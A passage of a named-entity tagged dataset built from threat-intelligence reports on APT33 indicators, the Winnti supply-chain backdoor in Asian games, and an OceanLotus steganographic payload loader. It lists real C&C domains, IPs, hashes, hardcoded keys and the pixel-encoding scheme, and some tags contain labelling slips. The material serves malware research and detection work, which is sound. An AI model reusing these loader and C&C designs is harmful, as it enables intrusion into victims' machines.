+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+5.79.127.177 S-IP
+mypsh.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.35 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.35 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.35 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.36 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.37 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.38 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.39 S-IP
+remote-server.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.40 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.41 S-IP
+mynetwork.cf S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.42 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+
+gaming O
+industry O
+scope O
+attackers O
+asia O
+. O
+
+This O
+is O
+not O
+the O
+first O
+time O
+the O
+gaming O
+industry O
+has O
+been O
+targeted O
+by O
+attackers O
+who O
+compromise O
+game O
+developers O
+, O
+insert O
+backdoors O
+into O
+a O
+game’s O
+build O
+environment O
+, O
+and O
+then O
+have O
+their O
+malware O
+distributed O
+as O
+legitimate O
+software O
+. O
+
+In O
+April B-TIME
+2013 E-TIME
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+reported O
+that O
+a O
+popular O
+game O
+was O
+altered O
+to O
+include O
+a O
+backdoor O
+in O
+2011 S-TIME
+. O
+
+That O
+attack O
+was O
+attributed O
+to O
+perpetrators O
+Kaspersky S-SECTEAM
+called O
+the O
+Winnti S-APT
+Group O
+. O
+
+Yet O
+again O
+, O
+new O
+supply-chain B-ACT
+attacks E-ACT
+recently O
+caught O
+the O
+attention O
+of O
+ESET S-SECTEAM
+Researchers O
+. O
+
+This O
+time O
+, O
+two O
+games O
+and O
+one O
+gaming O
+platform O
+application O
+were O
+compromised O
+to O
+include O
+a O
+backdoor O
+. O
+
+Given O
+that O
+these O
+attacks O
+were O
+mostly O
+targeted O
+against O
+Asia S-LOC
+and O
+the O
+gaming O
+industry O
+, O
+it O
+shouldn’t O
+be O
+surprising O
+they O
+are O
+the O
+work O
+of O
+the O
+group O
+described O
+in O
+Kaspersky S-SECTEAM
+’s O
+“ O
+Winnti S-APT
+– O
+More O
+than O
+just O
+a O
+game O
+” O
+. O
+
+Although O
+the O
+malware O
+uses O
+different O
+configurations O
+in O
+each O
+case O
+, O
+the O
+three O
+affected O
+software O
+products O
+included O
+the O
+same O
+backdoor O
+code O
+and O
+were O
+launched O
+using O
+the O
+same O
+mechanism O
+. O
+
+While O
+two O
+of O
+the O
+compromised O
+products O
+no O
+longer O
+include O
+the O
+backdoor O
+, O
+one O
+of O
+the O
+affected O
+developers O
+is O
+still O
+distributing O
+the O
+trojanized O
+version O
+: O
+ironically O
+, O
+the O
+game O
+is O
+named O
+Infestation O
+, O
+and O
+is O
+produced O
+by O
+Thai S-LOC
+developer O
+Electronics B-IDTY
+Extreme E-IDTY
+. O
+
+We O
+have O
+tried O
+informing O
+them O
+several O
+times O
+, O
+through O
+various O
+channels O
+, O
+since O
+early O
+February S-TIME
+, O
+but O
+without O
+apparent O
+success O
+. O
+
+Let’s O
+look O
+at O
+how O
+the O
+malicious O
+payload O
+is O
+embedded O
+and O
+then O
+look O
+into O
+the O
+details O
+of O
+the O
+backdoor O
+itself O
+. O
+
+The O
+payload O
+code O
+is O
+started O
+very O
+early O
+during O
+the O
+execution O
+of O
+the O
+backdoored O
+executable O
+file O
+. O
+
+Right O
+after O
+the O
+PE O
+entry O
+point O
+, O
+the O
+standard O
+call O
+to O
+the O
+C O
+Runtime O
+initialization O
+( O
+__scrt_common_main_seh S-TOOL
+) O
+is O
+hooked O
+to O
+launch O
+the O
+malicious O
+payload O
+before O
+everything O
+else O
+. O
+
+This O
+may O
+suggest O
+that O
+the O
+malefactor O
+changed O
+a O
+build O
+configuration O
+rather O
+than O
+the O
+source O
+code O
+itself O
+. O
+
+The O
+code O
+added O
+to O
+the O
+executable O
+decrypts O
+and O
+launches O
+the O
+backdoor O
+in-memory O
+before O
+resuming O
+normal O
+execution O
+of O
+the O
+C O
+Runtime O
+initialization O
+code O
+and O
+all O
+the O
+subsequent O
+code O
+of O
+the O
+host O
+application O
+. O
+
+The O
+embedded O
+payload O
+data O
+has O
+a O
+specific O
+structure O
+, O
+that O
+is O
+parsed O
+by O
+the O
+added O
+unpacking O
+code O
+. O
+
+It O
+includes O
+an O
+RC4 B-TOOL
+key E-TOOL
+( O
+which O
+is O
+XORed B-TOOL
+with I-TOOL
+0x37 E-TOOL
+) O
+that O
+is O
+used O
+to O
+decrypt O
+a O
+filename O
+and O
+the O
+embedded O
+DLL S-TOOL
+file O
+. O
+
+The O
+actual O
+malicious O
+payload O
+is O
+quite O
+small O
+and O
+only O
+contains O
+about O
+17 O
+KB O
+of O
+code O
+and O
+data O
+. O
+
+The O
+configuration O
+data O
+is O
+simply O
+a O
+whitespace-separated O
+list O
+of O
+strings O
+. O
+
+The O
+configuration O
+consists O
+of O
+four O
+fields O
+: O
+
+C&C O
+server O
+URL O
+. O
+
+Variable O
+( O
+t O
+) O
+used O
+to O
+determine O
+the O
+time O
+to O
+sleep O
+in O
+milliseconds O
+before O
+continuing O
+the O
+execution O
+. O
+
+Wait O
+time O
+is O
+chosen O
+randomly O
+in O
+the O
+range O
+2/3 O
+t O
+to O
+5/3 O
+t
+. O
+
+A O
+string O
+identifying O
+a O
+campaign O
+. O
+
+A O
+semicolon-separated O
+list O
+of O
+executable O
+filenames O
+. O
+
+If O
+any O
+of O
+them O
+are O
+running O
+, O
+the O
+backdoor O
+stops O
+its O
+execution O
+. O
+
+ESET S-SECTEAM
+researchers O
+have O
+identified O
+five O
+versions O
+of O
+the O
+payload O
+: O
+
+Winnti S-APT
+: O
+a045939f O
+2018-07-11 B-TIME
+15:45:57 E-TIME
+https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php S-URL
+. O
+
+Winnti S-APT
+: O
+a260dcf1 O
+2018-07-11 B-TIME
+15:45:57 E-TIME
+https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php S-URL
+. O
+
+Winnti S-APT
+: O
+dde82093 O
+2018-07-11 B-TIME
+15:45:57 E-TIME
+https://bugcheck.xigncodeservice.com/Common/Lib/common.php S-URL
+. O
+
+Winnti S-APT
+: O
+44260a1d O
+2018-08-15 B-TIME
+10:59:09 E-TIME
+https://dump.gxxservice.com/common/up/up_base.php S-URL
+. O
+
+Winnti S-APT
+: O
+8272c1f4 O
+2018-11-01 B-TIME
+13:16:24 E-TIME
+https://nw.infestexe.com/version/last.php S-URL
+. O
+
+In O
+the O
+first O
+three O
+variants O
+, O
+the O
+code O
+was O
+not O
+recompiled O
+, O
+but O
+the O
+configuration O
+data O
+was O
+edited O
+in O
+the O
+DLL S-TOOL
+file O
+itself O
+. O
+
+The O
+rest O
+of O
+the O
+content O
+is O
+a O
+byte O
+for O
+byte O
+copy O
+. O
+
+Domain O
+names O
+were O
+carefully O
+chosen O
+to O
+look O
+like O
+they O
+are O
+related O
+to O
+the O
+game O
+or O
+application O
+publisher O
+. O
+
+The O
+apex O
+domain O
+was O
+set O
+to O
+redirect O
+to O
+a O
+relevant O
+legitimate O
+site O
+using O
+the O
+Namecheap S-TOOL
+redirection O
+service O
+, O
+while O
+the O
+subdomain O
+points O
+to O
+the O
+malicious O
+C&C O
+server O
+. O
+
+Winnti S-APT
+: O
+xigncodeservice.com S-DOM
+2018-07-10 B-TIME
+09:18:17 E-TIME
+https://namu.wiki/w/XIGNCODE S-URL
+. O
+
+Winnti S-APT
+: O
+gxxservice.com S-DOM
+2018-08-14 B-TIME
+13:53:41 E-TIME
+None O
+or O
+unknown O
+. O
+
+Winnti S-APT
+: O
+infestexe.com S-DOM
+2018-11-07 B-TIME
+08:46:44 E-TIME
+https://www.facebook.com/infest.in.th S-URL
+. O
+
+Winnti S-APT
+: O
+bugcheck.xigncodeservice.com S-DOM
+167.99.106.49 S-IP
+, O
+178.128.180.206 S-IP
+DigitalOcean S-IDTY
+. O
+
+Winnti S-APT
+: O
+dump.gxxservice.com S-DOM
+142.93.204.230 S-IP
+DigitalOcean S-IDTY
+. O
+
+Winnti S-APT
+: O
+nw.infestexe.com S-DOM
+138.68.14.195 S-IP
+DigitalOcean S-IDTY
+. O
+
+At O
+the O
+time O
+of O
+writing O
+, O
+none O
+of O
+the O
+domains O
+resolve O
+and O
+the O
+C&C O
+servers O
+are O
+not O
+responding O
+. O
+
+A O
+bot O
+identifier O
+is O
+generated O
+from O
+the O
+machine’s O
+MAC O
+address O
+. O
+
+The O
+backdoor O
+reports O
+information O
+about O
+the O
+machine O
+such O
+as O
+the O
+user O
+name O
+, O
+computer O
+name O
+, O
+Windows S-OS
+version O
+and O
+system O
+language O
+to O
+the O
+C&C O
+server O
+and O
+awaits O
+commands O
+. O
+
+The O
+data O
+is O
+XOR S-TOOL
+encrypted O
+with O
+the O
+key O
+“ O
+*&b0i0rong2Y7un1 O
+” O
+and O
+base64-encoded S-ENCR
+. O
+
+The O
+data O
+received O
+from O
+the O
+C&C O
+server O
+is O
+encrypted O
+using O
+the O
+same O
+key O
+. O
+
+This O
+simple O
+backdoor O
+has O
+only O
+four O
+commands O
+that O
+can O
+be O
+used O
+by O
+the O
+attacker O
+: O
+
+DownUrlFile O
+DownRunUrlFile O
+RunUrlBinInMem O
+UnInstall O
+. O
+
+The O
+commands O
+are O
+pretty O
+much O
+self-explanatory O
+. O
+
+They O
+allow O
+the O
+attacker O
+to O
+run O
+additional O
+executables O
+from O
+a O
+given O
+URL O
+. O
+
+The O
+last O
+one O
+is O
+perhaps O
+less O
+obvious O
+. O
+
+The O
+UnInstall O
+command O
+doesn’t O
+remove O
+the O
+malware O
+from O
+the O
+system O
+. O
+
+After O
+all O
+, O
+it O
+is O
+embedded O
+inside O
+a O
+legitimate O
+executable O
+that O
+still O
+needs O
+to O
+run O
+. O
+
+Rather O
+than O
+removing O
+anything O
+, O
+it O
+disables O
+the O
+malicious O
+code O
+by O
+setting O
+the O
+following O
+registry O
+value O
+to O
+1: O
+HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ImageFlag O
+. O
+
+When O
+the O
+payload O
+is O
+started O
+, O
+the O
+registry O
+value O
+is O
+queried O
+and O
+execution O
+is O
+aborted O
+if O
+set O
+. O
+
+Perhaps O
+the O
+attackers O
+are O
+trying O
+to O
+reduce O
+the O
+load O
+from O
+their O
+C&C O
+servers O
+by O
+avoiding O
+callbacks O
+from O
+uninteresting O
+victims O
+. O
+
+Based O
+on O
+ESET S-SECTEAM
+telemetry O
+, O
+one O
+of O
+the O
+second O
+stage O
+payload O
+delivered O
+to O
+victims O
+is O
+Win64/Winnti.BN S-FILE
+. O
+
+As O
+far O
+as O
+we O
+can O
+tell O
+, O
+its O
+dropper O
+was O
+downloaded O
+over O
+HTTPS O
+from O
+api.goallbandungtravel.com S-DOM
+. O
+
+We O
+have O
+seen O
+it O
+installed O
+as O
+a O
+Windows S-OS
+service O
+and O
+as O
+a O
+DLL S-TOOL
+in O
+C:\Windows\System32 O
+using O
+the O
+following O
+file O
+names O
+: O
+
+cscsrv.dll S-FILE
+dwmsvc.dll S-FILE
+iassrv.dll S-FILE
+mprsvc.dll S-FILE
+nlasrv.dll S-FILE
+powfsvc.dll S-FILE
+racsvc.dll S-FILE
+slcsvc.dll S-FILE
+snmpsvc.dll S-FILE
+sspisvc.dll S-FILE
+. O
+
+The O
+samples O
+we O
+have O
+analyzed O
+were O
+actually O
+quite O
+large O
+, O
+each O
+of O
+them O
+about O
+60 O
+MB O
+. O
+
+This O
+is O
+, O
+however O
+, O
+only O
+for O
+appearance O
+because O
+the O
+real O
+size O
+or O
+the O
+PE O
+file O
+is O
+between O
+63 O
+KB O
+and O
+72 O
+KB O
+, O
+depending O
+on O
+the O
+version O
+. O
+
+The O
+malware O
+files O
+simply O
+have O
+lots O
+of O
+clean O
+files O
+appended O
+to O
+them O
+. O
+
+This O
+is O
+probably O
+done O
+by O
+the O
+component O
+that O
+drops O
+and O
+installs O
+this O
+malicious O
+service O
+. O
+
+Once O
+the O
+service O
+runs O
+, O
+it O
+appends O
+the O
+extension O
+.mui O
+to O
+its O
+DLL S-TOOL
+path O
+, O
+reads O
+that O
+file O
+and O
+decrypts O
+it O
+using O
+RC5 S-TOOL
+. O
+
+The O
+decrypted O
+MUI O
+file O
+contains O
+position-independent O
+code O
+at O
+offset O
+0 O
+. O
+
+The O
+RC5 S-TOOL
+key O
+is O
+derived O
+from O
+the O
+hard O
+drive O
+serial O
+number O
+and O
+the O
+string O
+“ O
+f@Ukd!rCto O
+R$. O
+” O
+— O
+we O
+were O
+not O
+able O
+to O
+obtain O
+any O
+MUI O
+files O
+nor O
+the O
+code O
+that O
+installs O
+them O
+in O
+the O
+first O
+place O
+. O
+
+Thus O
+, O
+we O
+do O
+not O
+know O
+the O
+exact O
+purpose O
+of O
+this O
+malicious O
+service O
+. O
+
+Recent O
+versions O
+of O
+the O
+malware O
+include O
+an O
+“ O
+auto-update O
+” O
+mechanism O
+, O
+using O
+C&C O
+server O
+http://checkin.travelsanignacio.com S-URL
+. O
+
+That O
+C&C O
+server O
+served O
+the O
+latest O
+version O
+of O
+the O
+MUI O
+files O
+encrypted O
+with O
+a O
+static O
+RC5 S-TOOL
+key O
+. O
+
+The O
+C&C O
+server O
+was O
+not O
+responding O
+during O
+our O
+analysis O
+. O
+
+Let’s O
+start O
+with O
+who O
+is O
+not O
+targeted O
+. O
+
+Early O
+in O
+the O
+payload O
+, O
+the O
+malware O
+checks O
+to O
+see O
+if O
+the O
+system O
+language O
+is O
+Russian O
+or O
+Chinese O
+. O
+
+In O
+either O
+case O
+, O
+the O
+malware O
+stops O
+running O
+. O
+
+There O
+is O
+no O
+way O
+around O
+this O
+: O
+the O
+attackers O
+are O
+simply O
+not O
+interested O
+in O
+computers O
+configured O
+with O
+those O
+languages O
+. O
+
+ESET S-SECTEAM
+telemetry O
+shows O
+victims O
+are O
+mostly O
+located O
+in O
+Asia S-LOC
+, O
+with O
+Thailand S-LOC
+having O
+the O
+largest O
+part O
+of O
+the O
+pie O
+. O
+
+Given O
+the O
+popularity O
+of O
+the O
+compromised O
+application O
+that O
+is O
+still O
+being O
+distributed O
+by O
+its O
+developer O
+, O
+it O
+wouldn’t O
+be O
+surprising O
+if O
+the O
+number O
+of O
+victims O
+is O
+in O
+the O
+tens O
+or O
+hundreds O
+of O
+thousands O
+. O
+
+Supply-chain B-ACT
+attacks E-ACT
+are O
+hard O
+to O
+detect O
+from O
+the O
+consumer O
+perspective O
+. O
+
+It O
+is O
+impossible O
+to O
+start O
+analyzing O
+every O
+piece O
+of O
+software O
+we O
+run O
+, O
+especially O
+with O
+all O
+the O
+regular O
+updates O
+we O
+are O
+encouraged O
+or O
+required O
+to O
+install O
+. O
+
+So O
+, O
+we O
+put O
+our O
+trust O
+in O
+software O
+vendors O
+that O
+the O
+files O
+they O
+distribute O
+don’t O
+include O
+malware O
+. O
+
+Perhaps O
+that’s O
+the O
+reason O
+multiple O
+groups O
+target O
+software O
+developers O
+: O
+compromising O
+the O
+vendor O
+results O
+in O
+a O
+botnet O
+as O
+popular O
+as O
+the O
+software O
+that O
+is O
+hacked O
+. O
+
+However O
+, O
+there O
+is O
+a O
+downside O
+of O
+using O
+such O
+a O
+technique O
+: O
+once O
+the O
+scheme O
+is O
+uncovered O
+, O
+the O
+attacker O
+loses O
+control O
+and O
+computers O
+can O
+be O
+cleaned O
+through O
+regular O
+updates O
+. O
+
+We O
+do O
+not O
+know O
+the O
+motives O
+of O
+the O
+attackers O
+at O
+this O
+point O
+. O
+
+Is O
+it O
+simply O
+financial O
+gain? O
+Are O
+there O
+any O
+reasons O
+why O
+the O
+three O
+affected O
+products O
+are O
+from O
+Asian O
+developers O
+and O
+for O
+the O
+Asian O
+market? O
+Do O
+these O
+attackers O
+use O
+a O
+botnet O
+as O
+part O
+of O
+a O
+larger O
+espionage O
+operation? O
+ESET S-SECTEAM
+products O
+detect O
+this O
+threat O
+as O
+Win32/HackedApp.Winnti.A S-FILE
+, O
+Win32/HackedApp.Winnti.B S-FILE
+, O
+the O
+payload O
+as O
+Win32/Winnti.AG S-FILE
+, O
+and O
+the O
+second O
+stage O
+as O
+Win64/Winnti.BN S-FILE
+. O
+
+Compromised O
+file O
+samples O
+( O
+Win32/HackedApp.Winnti.A B-FILE
+and I-FILE
+B E-FILE
+) O
+
+Winnti S-APT
+: O
+7cf41b1acfb05064518a2ad9e4c16fde9185cd4b S-SHA1
+Tue B-TIME
+Nov I-TIME
+13 I-TIME
+10:12:58 I-TIME
+2018 E-TIME
+1729131071 O
+8272c1f4 O
+. O
+
+Winnti S-APT
+: O
+7f73def251fcc34cbd6f5ac61822913479124a2a S-SHA1
+Wed B-TIME
+Nov I-TIME
+14 I-TIME
+03:50:18 I-TIME
+2018 E-TIME
+19317120 O
+44260a1d O
+. O
+
+Winnti S-APT
+: O
+dac0bd8972f23c9b5f7f8f06c5d629eac7926269 S-SHA1
+Tue B-TIME
+Nov I-TIME
+27 I-TIME
+03:05:16 I-TIME
+2018 E-TIME
+1729131071 O
+8272c1f4 O
+. O
+
+Some O
+hashes O
+were O
+redacted O
+per O
+request O
+from O
+one O
+of O
+the O
+vendor O
+. O
+
+If O
+for O
+a O
+particular O
+reason O
+you O
+need O
+them O
+, O
+reach O
+out O
+to O
+us O
+at O
+threatintel@eset.com O
+. O
+
+Payload O
+Samples O
+( O
+Win32/Winnti.AG S-FILE
+) O
+
+Winnti S-APT
+: O
+a045939f53c5ad2c0f7368b082aa7b0bd7b116da S-SHA1
+https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php S-URL
+. O
+
+Winnti S-APT
+: O
+a260dcf193e747cee49ae83568eea6c04bf93cb3 S-SHA1
+https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php S-URL
+. O
+
+Winnti S-APT
+: O
+dde82093decde6371eb852a5e9a1aa4acf3b56ba S-SHA1
+https://bugcheck.xigncodeservice.com/Common/Lib/common.php S-URL
+. O
+
+Winnti S-APT
+: O
+8272c1f41f7c223316c0d78bd3bd5744e25c2e9f S-SHA1
+https://nw.infestexe.com/version/last.php S-URL
+. O
+
+Winnti S-APT
+: O
+44260a1dfd92922a621124640015160e621f32d5 S-SHA1
+https://dump.gxxservice.com/common/up/up_base.php S-URL
+. O
+
+Second O
+stage O
+samples O
+( O
+Win64/Winnti.BN S-FILE
+) O
+
+Winnti S-APT
+: O
+Dropper O
+delivered O
+by O
+api.goallbandungtravel.com S-DOM
+. O
+
+Winnti S-APT
+: O
+4256fa6f6a39add6a1fa10ef1497a74088f12be0 S-SHA1
+2018-07-25 B-TIME
+10:13:41 E-TIME
+None O
+. O
+
+Winnti S-APT
+: O
+bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 S-SHA1
+2018-10-10 B-TIME
+09:57:31 E-TIME
+http://checkin.travelsanignacio.com S-URL
+. O
+
+Winnti S-APT
+: O
+T1195 O
+Supply O
+Chain O
+Compromise O
+. O
+
+Winnti S-APT
+: O
+T1050 O
+New O
+Service O
+. O
+
+Winnti S-APT
+: O
+T1022 O
+Data O
+Encrypted O
+. O
+
+Winnti S-APT
+: O
+T1079 O
+Multilayer O
+Encryption O
+. O
+
+Winnti S-APT
+: O
+T1032 O
+Standard O
+Cryptographic O
+Protocol O
+( O
+RC4 S-ENCR
+, O
+RC5 O
+) O
+. O
+
+Winnti S-APT
+: O
+T1043 O
+Commonly O
+Used O
+Port O
+( O
+80 O
+, O
+443 O
+) O
+. O
+
+
+OceanLotus S-APT
+Steganography O
+Malware O
+Analysis O
+White O
+Paper O
+. O
+
+While O
+continuing O
+to O
+monitor O
+activity O
+of O
+the O
+OceanLotus S-APT
+APT O
+Group O
+, O
+BlackBerry B-SECTEAM
+Cylance E-SECTEAM
+researchers O
+uncovered O
+a O
+novel O
+payload O
+loader O
+that O
+utilizes O
+steganography O
+to O
+read O
+an O
+encrypted O
+payload O
+concealed O
+within O
+a O
+.png O
+image O
+file O
+. O
+
+The O
+steganography O
+algorithm O
+appears O
+to O
+be O
+bespoke O
+and O
+utilizes O
+a O
+least O
+significant O
+bit O
+approach O
+to O
+minimize O
+visual O
+differences O
+when O
+compared O
+with O
+the O
+original O
+image O
+to O
+prevent O
+analysis O
+by O
+discovery O
+tools O
+. O
+
+Once O
+decoded O
+, O
+decrypted O
+, O
+and O
+executed O
+, O
+an O
+obfuscated O
+loader O
+will O
+load O
+one O
+of O
+the O
+APT32 S-APT
+backdoors O
+. O
+
+Thus O
+far O
+, O
+BlackBerry B-SECTEAM
+Cylance E-SECTEAM
+has O
+observed O
+two O
+backdoors O
+being O
+used O
+in O
+combination O
+with O
+the O
+steganography O
+loader O
+– O
+a O
+version O
+of O
+Denes B-MAL
+backdoor E-MAL
+( O
+bearing O
+similarities O
+to O
+the O
+one O
+described O
+by O
+ESET S-SECTEAM
+) O
+, O
+and O
+an O
+updated O
+version O
+of O
+Remy B-MAL
+backdoor E-MAL
+. O
+
+However O
+, O
+this O
+can O
+be O
+easily O
+modified O
+by O
+the O
+threat O
+actor O
+to O
+deliver O
+other O
+malicious O
+payloads O
+. O
+
+The O
+complexity O
+of O
+the O
+shellcode O
+and O
+loaders O
+shows O
+the O
+group O
+continues O
+to O
+invest O
+heavily O
+in O
+development O
+of O
+bespoke O
+tooling O
+. O
+
+This O
+white O
+paper O
+describes O
+the O
+steganography O
+algorithm O
+used O
+in O
+two O
+distinct O
+loader O
+variants O
+and O
+looks O
+at O
+the O
+launcher O
+of O
+the O
+backdoor O
+that O
+was O
+encoded O
+in O
+one O
+of O
+the O
+.png O
+cover O
+images O
+. O
+mcvsocfg.dll S-FILE
+: O
+
+ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 S-SHA2
+Malware/Backdoor O
+659 O
+KB O
+( O
+674 O
+, O
+816 O
+bytes O
+) O
+PE32 O
+executable O
+for O
+MS O
+Windows S-OS
+( O
+DLL S-TOOL
+) O
+( O
+console O
+) O
+Intel S-IDTY
+80386 O
+32-bit O
+September B-TIME
+2018 E-TIME
+. O
+
+This O
+particular O
+OceanLotus S-APT
+malware O
+loader O
+attempts O
+to O
+imitate O
+McAfee S-S-SECTEAM
+’s O
+McVsoCfg B-TOOL
+DLL E-TOOL
+and O
+expects O
+to O
+be O
+side-loaded O
+by O
+the O
+legitimate O
+" O
+On O
+Demand O
+Scanner O
+" O
+executable O
+. O
+
+It O
+arrives O
+together O
+with O
+an O
+encrypted O
+payload O
+stored O
+in O
+a O
+separate O
+.png O
+image O
+file O
+. O
+
+The O
+.png O
+cover O
+file O
+is O
+actually O
+a O
+valid O
+image O
+file O
+that O
+is O
+not O
+malicious O
+on O
+its O
+own O
+. O
+
+The O
+payload O
+is O
+encoded O
+inside O
+this O
+image O
+with O
+the O
+use O
+of O
+a O
+technique O
+called O
+steganography O
+, O
+which O
+utilizes O
+the O
+least O
+significant O
+bits O
+of O
+each O
+pixel’s O
+color O
+code O
+to O
+store O
+hidden O
+information O
+, O
+without O
+making O
+overtly O
+visible O
+changes O
+to O
+the O
+picture O
+itself O
+. O
+
+The O
+encoded O
+payload O
+is O
+additionally O
+encrypted O
+with O
+AES128 S-ENCR
+and O
+further O
+obfuscated O
+with O
+XOR S-TOOL
+in O
+an O
+attempt O
+to O
+fool O
+steganography O
+detection O
+tools O
+. O
+
+Features O
+: O
+
+Side-loaded O
+DLL S-TOOL
+Loads O
+next-stage O
+payload O
+using O
+custom B-TOOL
+.png I-TOOL
+steganography E-TOOL
+Uses O
+AES128 S-ENCR
+implementation O
+from O
+Crypto++ B-TOOL
+library E-TOOL
+for O
+payload O
+decryption O
+Known O
+to O
+load O
+Denes B-MAL
+backdoor E-MAL
+, O
+might O
+possibly O
+be O
+used O
+also O
+with O
+other O
+payloads O
+. O
+
+The O
+malicious O
+DLL S-TOOL
+exports O
+the O
+same O
+function O
+names O
+as O
+the O
+original O
+mcvsocfg.dll S-FILE
+library O
+. O
+
+All O
+exports O
+contain O
+the O
+exact O
+same O
+code O
+which O
+will O
+decrypt O
+the O
+payload O
+, O
+inject O
+it O
+into O
+memory O
+, O
+and O
+execute O
+it O
+. O
+
+The O
+payload O
+is O
+encoded O
+inside O
+a O
+separate O
+.png O
+file O
+using O
+a O
+technique O
+called O
+steganography O
+. O
+
+On O
+top O
+of O
+that O
+, O
+the O
+decoded O
+payload O
+is O
+also O
+encrypted O
+with O
+AES-128 S-ENCR
+and O
+finally O
+obfuscated O
+with O
+XOR O
+0x3B O
+. O
+
+It’s O
+worth O
+noting O
+that O
+the O
+XOR S-TOOL
+key O
+is O
+not O
+hardcoded O
+, O
+but O
+instead O
+is O
+read O
+from O
+the O
+first O
+byte O
+of O
+the O
+C:\Windows\system.ini S-FILE
+file O
+. O
+
+One O
+of O
+the O
+payloads O
+we O
+encountered O
+was O
+encoded O
+inside O
+an O
+image O
+of O
+Kaito O
+Kuroba1 O
+, O
+the O
+gentleman O
+thief O
+character O
+from O
+a O
+popular O
+Japanese O
+manga O
+series O
+. O
+
+To O
+extract O
+the O
+payload O
+, O
+the O
+malware O
+will O
+first O
+initialize O
+the O
+GDI+ O
+API O
+and O
+get O
+the O
+image O
+width O
+and O
+height O
+values O
+. O
+
+The O
+size O
+of O
+the O
+payload O
+is O
+encoded O
+within O
+the O
+first O
+four O
+pixels O
+of O
+the O
+image O
+. O
+
+After O
+obtaining O
+the O
+size O
+, O
+the O
+malware O
+will O
+allocate O
+an O
+appropriate O
+memory O
+buffer O
+and O
+proceed O
+to O
+decode O
+the O
+remaining O
+payload O
+byte O
+by O
+byte O
+. O
+
+The O
+payload O
+is O
+encoded O
+in O
+the O
+same O
+way O
+as O
+the O
+size O
+– O
+each O
+byte O
+of O
+the O
+payload O
+is O
+computed O
+from O
+the O
+ARGB O
+color O
+codes O
+of O
+each O
+subsequent O
+pixel O
+in O
+the O
+image O
+. O
+
+In O
+case O
+the O
+payload O
+is O
+bigger O
+than O
+the O
+image O
+used O
+to O
+store O
+it O
+, O
+the O
+remaining O
+payload O
+bytes O
+are O
+simply O
+attached O
+to O
+the O
+image O
+after O
+its O
+IEND O
+marker O
+, O
+and O
+read O
+directly O
+from O
+the O
+file O
+. O
+
+The O
+pixel O
+encoding O
+algorithm O
+is O
+fairly O
+straightforward O
+and O
+aims O
+to O
+minimize O
+visual O
+differences O
+when O
+compared O
+to O
+the O
+original O
+image O
+by O
+only O
+modifying O
+the O
+least O
+significant O
+bits O
+of O
+the O
+red O
+, O
+green O
+, O
+and O
+blue O
+color O
+byte O
+values O
+. O
+
+The O
+alpha O
+channel O
+byte O
+remains O
+unchanged O
+. O
+
+To O
+encode O
+a O
+byte O
+of O
+the O
+payload O
+, O
+the O
+first O
+three O
+bits O
+( O
+0-2 O
+) O
+are O
+stored O
+in O
+the O
+red O
+color O
+, O
+the O
+next O
+three O
+bits O
+( O
+3-5 O
+) O
+are O
+stored O
+in O
+the O
+green O
+color O
+, O
+and O
+the O
+final O
+two O
+bits O
+( O
+6-7 O
+) O
+are O
+stored O
+in O
+the O
+blue O
+color O
+. O
+
+Decoding O
+is O
+a O
+simple O
+inverse O
+operation O
+. O
+
+Windows S-OS
+converts O
+the O
+.png O
+pixel O
+RGBA O
+value O
+to O
+an O
+ARGB O
+encoding O
+via O
+the O
+GdpiBitmapGetPixel B-TOOL
+API E-TOOL
+. O
+
+To O
+aid O
+in O
+the O
+recovery O
+of O
+encrypted O
+payloads O
+, O
+the O
+following O
+Python B-TOOL
+script E-TOOL
+can O
+be O
+used O
+to O
+decode O
+pixel O
+colors O
+from O
+a O
+.png O
+image O
+. O
+
+After O
+decoding O
+the O
+.png O
+image O
+, O
+the O
+loader O
+then O
+proceeds O
+to O
+initialize O
+the O
+key O
+and O
+IV O
+used O
+to O
+perform O
+AES O
+decryption O
+of O
+the O
+encrypted O
+payload O
+. O
+
+Both O
+values O
+are O
+supplied O
+from O
+an O
+array O
+of O
+256 O
+pseudo-random O
+bytes O
+hardcoded O
+in O
+the O
+binary’s O
+.rdata O
+section O
+. O
+
+The O
+first O
+two O
+bytes O
+of O
+that O
+array O
+specify O
+the O
+relative O
+offsets O
+to O
+the O
+key O
+and O
+IV O
+respectively O
+. O
+
+The O
+loader O
+uses O
+the O
+AES128 S-ENCR
+implementation O
+from O
+the O
+open-source O
+Crypto++2 B-TOOL
+library E-TOOL
+. O
+
+We O
+were O
+able O
+to O
+correlate O
+most O
+of O
+the O
+disassembly O
+to O
+the O
+corresponding O
+functions O
+from O
+the O
+Crypto++ S-TOOL
+github O
+source O
+, O
+and O
+it O
+doesn’t O
+appear O
+that O
+the O
+malware O
+authors O
+have O
+modified O
+much O
+of O
+the O
+original O
+code O
+. O
+
+A O
+SimpleKeyringInterface S-TOOL
+class O
+is O
+used O
+to O
+initialize O
+the O
+key O
+, O
+while O
+the O
+IV O
+is O
+passed O
+to O
+the O
+SetCipherWithIV S-TOOL
+function O
+. O
+
+The O
+decryption O
+is O
+performed O
+with O
+the O
+use O
+of O
+the O
+StreamTransformationFilter S-TOOL
+class O
+with O
+the O
+StreamTransformation S-TOOL
+cipher O
+set O
+to O
+AES O
+CBC O
+decryption O
+mode O
+. O
+
+The O
+library O
